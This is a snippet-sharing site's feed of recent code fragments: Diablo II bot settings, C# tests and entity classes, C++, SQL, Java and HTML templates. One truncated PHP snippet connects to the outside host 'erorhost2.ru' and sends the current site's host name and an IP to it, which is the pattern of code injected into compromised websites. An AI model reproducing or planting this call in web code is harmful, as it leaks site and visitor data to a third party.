New Snippet New Snippet Recent Snippets Recent Snippets My Snippets My Snippets Web Code Search Snippets Search
Sign inor Register
Format:
//##############################################################################################################################
// Do Not distribute these scripts without the credits #########################################################################
//##############################################################################################################################
//Regards - Medix from http://www.bot-area.net #################################################################################
//##############################################################################################################################
var gameMinLength      = 90000;   // time in milliseconds, minimum game length, 180 seconds default (1 game/3 minutes)
var unableToConnectRetry   = 5;      // time in minutes to retry connecting on connection fail (real value is +/- 1 min)
var realmDownRetry      = 180;      // time in minutes to retry connecting on a realm down (default is 120 minutes)
var disconnectedRetry      = 5;      // time in minutes to retry on a disconnection (usually ip ban related)
var cdkeyInUseRetry      = 5;      // time in minutes to retry on a cdkey in use error message (set to 0 to stop)
Today @ 5:54pm
Tags:
3 Views
no comments
 
// Some goodies that sell good.
 
[Name] == Demonhead && [Quality] == unique && [Flag] == ethereal // Andariel's Visage
[Name] == SpiredHelm && [Quality] == unique # [Dexterity] >= 10  // Nightwing's Veil
[Name] == Corona && [Quality] == unique  // Crown of ages
[Name] == ScarabshellBoots && [Quality] == unique && [Flag] == ethereal //eTrek
 
//Runes - Activate the ones you need.
// ##### Runes #########################
//[Name] == ElRune
Today @ 5:53pm
Tags:
3 Views
no comments
 
var NTConfig_CastStatic;
var NTConfig_Teleport;
 
    //#################################################################
    //############################### Shop Bot ########################
    //#############################Einstellungen#######################
    //#################################################################
 
// base shop d2x £¨if need shop d2c, set this true £©
var is_D2C = false;
Today @ 5:46pm
Tags:
3 Views
no comments
 
C#
[TestFixture]
  public class ObjectTests
  {
      #region Setup/Teardown
 
      [SetUp]
      public void SetUp()
      {
          _id1 = Guid.NewGuid();
          _id2 = Guid.NewGuid();
Today @ 2:12pm
Tags:
5 Views
no comments
 
C++
#include <vector>
#include <list>
#include <map>
#include <set>
#include <deque>
#include <stack>
#include <bitset>
#include <algorithm>
#include <functional>
#include <numeric>
by MohamedMonem   Today @ 1:47pm
Tags:
4 Views
no comments
 
<form method="post" action="{url:news_recent}">
<div style="display:none;"><input type="hidden" name="cs_xsrf_key" value="0a2b54dcd9090e2e4f4ac3b3954df03d" /></div>
 
<div class="news_001">
<div class="news3">{cats:dropdown}<input type="submit" name="submit" value="Anzeigen" /></div>
</div>
</form>
<div style="float:left; width:100%;">
<div style="float:left; margin-left:2px; background:url(/templates/BlueSky_template_v1/images/news/db/news_db_001.png) bottom no-repeat; width:720px;">
<div style="background:url(/templates/BlueSky_template_v1/images/db/dlb_x.png); width:720px; height:23px;">
Today @ 11:43am
Tags:
4 Views
no comments
 
# Unit Categorization for E323AI
 
# Categories to choose from:
# NAVAL
# TECH1
# TECH2
# TECH3
# TECH4
# TECH5
# AIR
Today @ 11:03am
Tags:
7 Views
no comments
 
SQL
Select 
    value 
From Integers
Where value NOT IN (Select 
                        SecondDeviceResponded
                    From DeviceTimeLog
                    Where DeviceId = 1)
Today @ 10:22am
Tags:
5 Views
no comments
 
C++
#include<iostream>
using namespace std;
 
int n , L, C;
int dp[1001][501];
int topics[1001];
int needed;
 
#define oo (int)1e9
 
by amrmahdi   Today @ 8:51am
Tags:
4 Views
no comments
 
C#
[TestFixture]
 public class EntityTests
 {
     #region Setup/Teardown
 
     [SetUp]
     public void SetUp()
     {
         _id1 = Guid.NewGuid();
         _id2 = Guid.NewGuid();
Today @ 8:20am
Tags:
9 Views
no comments
 
C#
[Serializable]
public abstract class Entity : ValueObject, IEntity
{
    public virtual Guid Id { get; protected set; }
    private int? _cachedHashCode;
 
    public virtual bool IsTransient()
    {
        return Id.Equals(null) || Id.Equals(Guid.Empty);
    }
Today @ 8:20am
Tags:
11 Views
no comments
 
C#
[Serializable]
public abstract class Entity : ValueObject, IEntity
{
    #region Fields & Properties
 
    public virtual Guid Id { get; protected set; }
    private int? _cachedHashCode;
 
    #endregion
Today @ 8:19am
Tags:
4 Views
no comments
 
C#
 [Serializable]
  public abstract class ValueObject : IEquatable<ValueObject>
  {
      public bool Equals(ValueObject other)
      {
          // is other null?
          if (ReferenceEquals(other, null))
              return false;
 
          // are they the same object?
Today @ 8:18am
Tags:
11 Views
no comments
 
C#
[Test]
       public void comparing_to_a_null_object_is_false_and_cannot_be_equal()
       {
           var phone = new Telephone(11111, 111111);
 
           Assert.That(phone.Equals(null), Is.False);
       }
 
       [Test]
       public void comparing_to_self_is_true_and_always_equal()
Today @ 8:17am
Tags:
9 Views
no comments
 
C#
[Test]
       public void comparing_to_a_null_object_is_false_and_cannot_be_equal()
       {
           var phone = new Telephone(11111, 111111);
 
           Assert.That(phone.Equals(null), Is.False);
       }
 
       [Test]
       public void comparing_to_self_is_true_and_always_equal()
Today @ 8:16am
Tags:
5 Views
no comments
 
C#
[Test]
       public void comparing_to_a_null_object_is_false_and_cannot_be_equal()
       {
           var phone = new Telephone(11111, 111111);
 
           Assert.That(phone.Equals(null), Is.False);
       }
 
       [Test]
       public void comparing_to_self_is_true_and_always_equal()
Today @ 8:16am
Tags:
5 Views
no comments
 
<C><P G="0,15" /><Z><S><S L="10" H="200" X="256" Y="281" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="120" H="100" X="473" Y="179" T="0" P="1,1,0.3,0.2,0,1,0,0" /><S L="120" H="100" X="598" Y="204" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="120" H="100" X="723" Y="124" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="120" H="100" X="302" Y="96" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="120" H="100" X="178" Y="162" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="120" H="100" X="55" Y="176" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="10" H="5000" X="793" Y="2374" T="1" P="0,0,0,0.2,0,0,0,0" /><S L="10" H="138" X="142" Y="283" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="10" H="110" X="58" Y="282" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="10" H="145" X="423" Y="306" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="10" H="121" X="562" Y="333" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="10" H="150" X="710" Y="253" T="0" P="1,0,0.3,0.2,0,1,0,0" /><S L="10" H="1000" X="-23" Y="151" T="1" P="0,0,0,0.2,10,0,0,0" /></S><D><DS Y="85" X="162" /><DC Y="75" X="174" /></D><O><O C="3" Y="379" P="0" X="303" /><O C="12" Y="379" P="0" X="298" /><O C="14" Y="378" P="0" X="256" /><O C="3" Y="378" P="0" X="467" /><O C="3" Y="376" P="-20" X="601" /><O C="3" Y="369" P="80" X="717" /><O C="3" Y="379" P="45" X="173" /><O C="3" Y="379" P="90" X="58" /><O C="14" Y="351" P="0" X="143" /><O C="14" Y="335" P="0" X="58" /><O C="14" Y="389" P="0" X="564" /><O C="14" Y="378" P="0" X="423" /><O C="14" Y="325" P="0" X="710" /><O C="12" Y="372" P="0" X="718" /><O C="12" Y="375" P="0" X="600" /><O C="12" Y="375" P="0" X="467" /><O C="12" Y="378" P="0" X="172" /><O C="12" Y="377" P="0" X="59" /></O></Z></C>
Today @ 7:42am
Tags:
6 Views
no comments
 
<table style="width: 100%" border="1px">
    <tr >
        <td colspan="2" style="height:50px;">&nbsp;</td>
        <td>&nbsp;</td>
    </tr>
    <tr>
        <td>&nbsp;</td>
        <td>&nbsp;</td>
        <td>&nbsp;</td>
    </tr>
Today @ 7:17am
Tags:
8 Views
no comments
 
<?php 
 
$ Fp = @fsockopen("erorhost2.ru", 80, $ errno, $ errstr, 6); 
if (!$ fp) 
{ 
    return ''; 
} else 
{ 
 
    $page = @file("http://erorhost2.ru/id1.php?site=" . $_SERVER[HTTP_HOST] . "&ip=" . 
Today @ 7:14am
Tags:
6 Views
no comments
 
package controller;
 
import java.awt.event.MouseEvent;
import java.awt.event.MouseListener;
import java.util.Enumeration;
 
import javax.swing.AbstractButton;
import javax.swing.ButtonGroup;
import javax.swing.JToggleButton;
Today @ 6:40am
Tags:
6 Views
no comments
 
C++
#include <vector>
#include <list>
#include <map>
#include <set>
#include <deque>
#include <stack>
#include <bitset>
#include <algorithm>
#include <functional>
#include <numeric>
by Islam   Today @ 5:52am
Tags:
6 Views
no comments
 
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
 
public class demoClassOne {
 
    private static String myString = null;
 
    public static void main(String args[]) {
        myString = getUserInput();
Today @ 5:26am
Tags:
5 Views
no comments
 
<?php
$user = &JFactory::getUser();
$username = $user->get('username');
echo $username;
?>
 
 
<form method="post" action="https://www.sofortueberweisung.de/payment/start">
<input name="user_id" value="34559" type="hidden">
<input name="project_id" value="91392" type="hidden">
Today @ 2:48am
Tags:
9 Views
no comments
 
public void actionPerformed(ActionEvent arg0) {
        boolean fileExists = true;
        StringBuffer buffer = new StringBuffer();
 
        try {
            File datei = new File(SaveListener.FILEPATH, SaveListener.FILENAME + SaveListener.FILEEXTENSION);
            if (!datei.exists()) {
                fileExists = false;
                // Create new HamsterProgram.java
                parent.getSaveListener().actionPerformed(arg0);
Today @ 1:32am
Tags:
6 Views
no comments
 
package view;
 
import java.awt.Color;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.io.Writer;
import java.util.ArrayList;
Today @ 1:27am
Tags:
6 Views
no comments
 
brought to you by:
West Wind Techologies


If you find this site useful and use it frequently please consider making a donation to support this free service.
Donate